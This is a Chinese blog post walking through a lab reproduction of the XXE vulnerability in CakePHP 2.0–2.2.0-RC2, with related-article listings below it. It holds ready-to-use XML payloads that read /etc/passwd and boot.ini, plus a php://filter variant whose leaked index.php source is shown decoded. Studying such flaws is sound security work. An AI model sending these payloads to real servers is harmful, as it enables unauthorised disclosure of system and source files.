CakePHP XML外部实体漏洞

于 2021-11-10 11:25:15 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 框架漏洞 文章标签: xml 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121244332
版权

CakePHP XML外部实体漏洞

一、CakePHP详解:

CakePHP是一个开源的PHP on rails的full-stack framework。最开始从Ruby On Rails框架里得到灵感。程序员可使用它来快速创建的Web应用程序。我们的首要目的是使你以一种预置的快速且不失灵活性的方式开展工作。

CakePHP 2.0 - 2.2.0-RC2存在XML外部实体注入漏洞,攻击者可利用此漏洞获取本地文件敏感信息。

二、CakePHP漏洞复现:

搭建好环境,访问

http://172.16.12.2/simplexml_load_string.php
 

进行burp抓包,注入poc

Linux:

<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:


<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>

将会读取到passwd文件的内容

如果修改XML中的外部实体为其他协议,如php://filter/read=convert.base64-encode/resource=index.php,在Proxy选项卡的原数据包中粘贴XML内容,点击FORWARD放行请求,返回的结果在浏览器上显示如下

返回值为PD9waHANCnBocGluZm8oKTsNCj8+,经过base64解码,可以看到字符串是index.php的源代码 

 
<?php
 
phpinfo();
 
?>

我们来访问一下index.php,可以看到确实是执行了phpinfo();函数

三、漏洞修复建议:

安装厂商的补丁 

xzhome
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CakePHP php框架 v5.0.7
04-07
cakephp.org站点的Sites in the wild页面可以看到当前使用CakePHP框架的网站列表。 CakePHP 是一个运用了诸如ActiveRecord、Association Data Mapping、Front Controller和MVC等著名设计模式的快速开发框架。该...
Web开发框架安全杂谈(转载)
justforme123的专栏
03-20 168
转自:http://www.80sec.com/security-about-framework.html Web开发框架安全杂谈 Write by admin in 未分类 at 2011-03-15 22:21:03 Web开发框架安全杂谈 EMail: wofeiwo#80sec.com Site: http://www.80sec.com Date: 2011-03-14...
文件包含漏洞原理分析
weixin_30955341的博客
08-03 1191
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。 我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个...
PHP常用框架及漏洞
小小猪的博客
08-14 2774
PHP常用框架及漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
CakePHP及Symfony2 漏洞合集
小小猪的博客
08-19 1977
CakePHP 漏洞 CakePHP XML外部实体漏洞 搭建好环境,访问 http://172.16.12.2/simplexml_load_string.php 进行burp抓包,注入poc Linux: <!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///etc/passwd" >]> <request> <xxe>&payload;</xxe> </..
学好Python开发你一定会用到这30框架种
轻松学python的博客
11-07 953
现在Python成为了炽手可热的一门语言,在如何快速入门的同时,如何进行高效的开发是一门语言非常重要的优势。我们收集马哥Python了超过2000名学员的意见和建议,对Python常用的框架进行了梳理,这些框架包括事件I/O,OLAP,Web开发,高性能网络通信,测试,爬虫等。 Python目前主流的应用包括:Web开发、图形界面开发、系统网络运维、网络编程、科学数字计算、3D游戏开发,而我...
PHP漏洞全解(一)-PHP网站安全性问题
稻草人技术博客
12-11 2544
命令注入攻击PHP中可以使用下列5个函数来执行外部的应用程序或函数system、exec、passthru、shell_exec、“(与shell_exec功能相同)函数原型string system(string command, int &return_var)command 要执行的命令return_var 存放执行命令的执行后的状态值string exec (string command,
初品cakephp 入门基础
12-18
首先来看一下cakephp的的执行流程(从百度百科借来的图片): 1:首先你的服务器必须支持rewrite,如果是不支持rewrite的虚拟主机的话cakephp是不能正常运行的。 2:将所有的请求定向到cakephp框架后就进入了框架的...
初学CAKEPHP 基础教程
01-20
CAKEPHP是美国团队开发的一个系统,大家在找CAKEPHP资料的时候去GOOGLE搜索的资料精确些!或者去官方网站上去查!官方网址是www.cakephp.org!  首先我们来讨论一下为什么要用CAKEPHP!cakephp继承了rails的优点!开发...
cakephp-2.2.4.rar_cakephp
09-24
CakePHP是一个快速开发PHP的开发框架,其中使用了一些常见的设计模式如ActiveRecord,Association Data Mapping,Front Controller以及MVC。其主要目标在于提供一个令任意水平的PHP开发人员都能够快速开发web应用的...
url存在链接注入漏洞_【漏洞通告】Citrix SDWAN远程代码执行漏洞通告(CVE20208271)...
weixin_30750685的博客
01-05 491
2020年11月8日,安全研究者Ariel Tempelhof披露,Citrix SD-WAN中存在多个漏洞,影响除最新版本11.2.2,11.1.2b和10.2.8以外的多个版本,攻击者可以利用此漏洞执行任意代码。近日漏洞利用方式被公开,深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。漏洞名称 :Citrix SD-WAN远程代码执行漏洞(CVE-2020-8271)...
CakePHP: 安全性方面的考虑
陈小峰(iefreer)的专栏
06-01 3231
1、XSS典型的例子是在用户签名字段中输入html代码: 如果该数据被存储到系统中,然后拥有系统管理权限的人查看该用户信息,将导致误删除动作。解决方法有:使用h()来处理界面用户输入,会把html符号转义,从而使html输入无效使用htmlpurify组件来校验用户输入数据,这会有点慢使用model层面的validate规则,在你自己的app_model基类中定义检查函数    public function saneHtml($check) {        return current($check)
最好用的开源Web漏洞扫描工具梳理
热门推荐
代码技巧
12-09 1万+
来自FreeBuf.COM*参考来源:geekflare,FB小编柚子编译链接:www.freebuf.com/articles/web/155209.html赛门铁克2017年互联网安全威胁报告中提出在他们今年扫描的网站中,有76%都含有恶意软件。如果你在用WordPress,SUCURI的另一份报告也显示,超过70%的被扫描网站也都存在一个或多个漏洞。如果你刚好是某个网络应用程序的所有者,怎样
cakephp源码安装with路由with href连接_从0到ReverseShell:路由器漏洞靶场DVAR实践
weixin_29479879的博客
12-10 541
前言DVAR是一个模拟arm架构路由器的漏洞靶场,本文将介绍如何从无到有获取一个反向shell,中间会包含环境搭建,漏洞定位与利用,以及这次实践的心得。1.知识基础本文将步骤尽可能写的详细易懂,如果你也想自己动手完成这次实践,最起码需要掌握的是arm汇编(寄存器作用,指令含义,栈的相关操作,程序流程控制,arm和thumb指令特性),IDA分析(F5, 阅读c代码)。2.环境搭建2.1 ...
CakePHP的坏味道
phphot
11-03 3495
作者:老王CakePHP成为PHP社区里最流行的框架,并不是因为CakePHP本身做得如何如何好,而是因为其他框架做得太差。CakePHP本身缺点多多,下面简要阐述一些CakePHP的坏味道:* Route配置文件的膨胀CakePHP的缺省实现中,我们并不用去设置Route,系统会遵循/controller/action/param的形式去解析URL。但是很多时候这样的URL并不友好,于是我们就要
框架注入漏洞
conkeyn的专栏
02-27 5449
  2 详细描述 攻击者有可能注入含有恶意内容的 frame 或 iframe 标记。如果用户不够谨慎,就有可能浏览该标记,却意识不到自己会离开原始站点而进入恶意的站点。之后,攻击者便可以诱导用户再次登录,然后获取其登录凭证。 解决办法 建议过滤出所有以下字符: [1] |(竖线符号) [2] &amp; (&amp; 符号) [3];(分号) [4] $(美元符号...
CakePHP系列(二)----博客(Blog)案例(一)
fendo
02-23 2251
一、Blog案例 本教程将引导您完成一个简单的博客应用程序的创建。 我们将安装CakePHP,创建一个数据库,并创建足够的应用程序逻辑来列出,添加,编辑和删除博客文章。 以下是您需要的: 正在运行的Web服务器。 我们将假设您使用Apache,但使用其他服务器的说明应该非常相似。 我们可能需要对服务器配置发挥一点,但是大多数人可以在没有任何配置的情况下启动和运行Cak
cakephp operation_log
最新发布
06-03
CakePHP的操作日志记录可以使用CakePHP的内置功能。首先,您需要创建一个名为`operation_logs`的数据库表,其中包含以下字段: - id(主键) - user_id(用户ID) - action(操作名称) - created(创建时间) 接下来,您需要在CakePHP中创建一个`OperationLogsTable`模型来管理`operation_logs`表。该模型应该具有一个`logAction`方法,用于记录操作日志。该方法应该接受三个参数:用户ID,操作名称和记录时间。以下是一个示例实现: ```php // src/Model/Table/OperationLogsTable.php namespace App\Model\Table; use Cake\ORM\Table; class OperationLogsTable extends Table { public function logAction($userId, $action, $timestamp) { $log = $this->newEntity([ 'user_id' => $userId, 'action' => $action, 'created' => $timestamp ]); $this->save($log); } } ``` 现在,您可以在您的应用程序中的任何控制器中使用`OperationLogsTable`模型来记录操作日志。例如: ```php // src/Controller/ArticlesController.php namespace App\Controller; use App\Model\Table\OperationLogsTable; use Cake\Controller\Controller; class ArticlesController extends Controller { public function index() { $this->loadModel('OperationLogs'); $this->OperationLogs->logAction($this->Auth->user('id'), 'viewed articles', time()); // rest of action code } } ``` 此代码将记录一个名为“viewed articles”的操作,该操作由当前已验证用户执行,并在当前时间创建了一个操作日志记录。您可以像这样记录任何操作,只要您想要跟踪和记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值